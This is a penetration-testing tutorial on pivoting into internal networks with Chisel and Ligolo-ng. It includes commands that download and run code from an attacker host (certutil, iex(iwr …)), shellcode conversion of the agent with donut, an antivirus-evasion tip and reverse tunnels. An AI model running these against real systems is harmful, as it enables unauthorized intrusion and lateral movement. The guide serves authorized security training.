Port Forwarding and Pivoting with Chisel and Ligolo-ng (Linux + Windows)
Port Forwarding and Pivoting with Chisel and Ligolo-ng
Disclaimer
This post is for authorized security testing and lab environments only.
Only use these techniques on systems you own or have explicit permission to assess.
Why Port Forwarding Matters in Pivoting
Port forwarding and tunneling allow you to reach internal networks that are not directly accessible from your attacker machine.
Two commonly used tools:
Chisel Fast, simple TCP tunneling and SOCKS pivoting. Excellent for quick pivots and proxychains workflows.
Ligolo-ng A network-native pivot using a TUN interface, allowing you to route traffic as if directly connected to the internal subnet.
Notes on IP Addresses and When Pivoting Is Needed
All IP addresses in this post are examples.
- Addresses like
192.168.1.1are commonly used as example “attacker reachable” IPs (lab VPN, public VPS, or your Kali interface reachable by the target). - After initial access, you often discover additional internal-only networks, for example
172.16.0.0/12,10.0.0.0/8, or another192.168.0.0/16segment.
A common real-world pattern:
- You gain initial access on a host reachable from your Kali or C2.
- That host has a second interface on an internal subnet (for example
172.16.1.0/24). - Your Kali cannot directly reach that internal subnet.
- You set up a tunnel (Chisel or Ligolo-ng) through the compromised host to reach
172.16.1.0/24and any deeper segments.
Example:
- Kali or C2 reachable IP:
192.168.1.1(example) - Pivot host internal interface:
172.16.1.10 - Internal subnet to enumerate:
172.16.1.0/24
Pivoting is what bridges that gap.
Kali (192.168.1.1) │ ▼ Compromised Host (172.16.1.10) │ ▼ Internal Network (172.16.1.0/24)
Part 1 – Chisel Pivoting (Reverse SOCKS Tunnel)
Kali Setup (Server)
1
./chisel server -p 8000 --reverse --socks5
Verify listening:
1
ss -lntp | grep 8000
Linux Target (Client)
1
./chisel client 192.168.1.1:8000 R:1080:socks &
Configure proxychains:
1
socks5 127.0.0.1 1080
Example usage:
1
proxychains nmap -sT -Pn 10.10.10.0/24
Windows Target (Client)
Transfer:
1
certutil -urlcache -split -f http://192.168.1.1/chisel.exe chisel.exe
Host from Kali:
1
python3 -m http.server 80
Run client:
1
.\chisel.exe client 192.168.1.1:8000 R:1080:socks
Part 2 – Ligolo-ng Pivoting (TUN Based Routing)
Build Ligolo-ng
1
2
go build -o agent cmd/agent/main.go
go build -o proxy cmd/proxy/main.go
Windows build:
1
2
GOOS=windows go build -o agent.exe cmd/agent/main.go
GOOS=windows go build -o proxy.exe cmd/proxy/main.go
Kali Setup (Proxy + TUN)
1
2
3
sudo ip tuntap add user <your_username> mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
Target Setup (Agent)
1
./agent -connect <kali_ip>:11601 -ignore-cert
Route Internal Subnet
1
sudo ip route add 10.1.2.0/24 dev ligolo
Start tunnel inside Ligolo:
1
start
Pro-Tip: If you are pivoting into a Windows environment and can’t ping targets, remember that Windows Firewall often drops ICMP by default. Even if the host looks “down” via ping, try a TCP port check (e.g., nc -zv 10.1.2.x 445) to confirm the tunnel is active.
Part 3 – Running Ligolo Agent via PowerShell (Shellcode Runner)
Reference: OSEP Playground Tunneling Reference
A. Convert agent.exe to Shellcode
1
donut -f 1 -o agent.bin -a 2 -p "-connect your-server:11601 -ignore-cert" -i agent.exe
-a 2 indicates x64 architecture.
B. Confirm 64-bit Process
PowerShell:
1
[Environment]::Is64BitProcess
CMD:
set p
Should display:
1
PROCESSOR_ARCHITECTURE=AMD64
C. Use ligolo.ps1 Runner
Update inside ligolo.ps1:
1
$url = "http://192.168.1.1/agent.bin"
Serve files from Kali:
1
python3 -m http.server 80
Execute from target:
1
iex(iwr http://192.168.1.1/ligolo.ps1 -UseBasicParsing)
If detected by AV, consider using ligolo-psrunner.ps1 alternative.
Cleanup
Remove Ligolo Interface
1
2
sudo ip link set ligolo down
sudo ip link delete ligolo
Stop Chisel
1
2
ps aux | grep chisel
kill -9 <pid>
Tool Comparison Table
| Feature | Chisel | Ligolo-ng |
|---|---|---|
| Traffic Type | TCP (via SOCKS proxy) | Full Network Stack (ICMP / UDP / TCP) |
| Ease of Use | High (No sudo/admin required) | Medium (Requires TUN + root on Kali) |
| Performance | Good | Excellent (Native routing feel) |
| Nmap Support | Requires proxychains + -sT | Works natively (e.g., nmap 10.1.2.1) |
Credits
Final Note
Always document:
- Entry point
- Pivot host
- Internal subnet
- Tool used and why
- Port mappings and listeners
Clear documentation improves reproducibility and reporting quality.
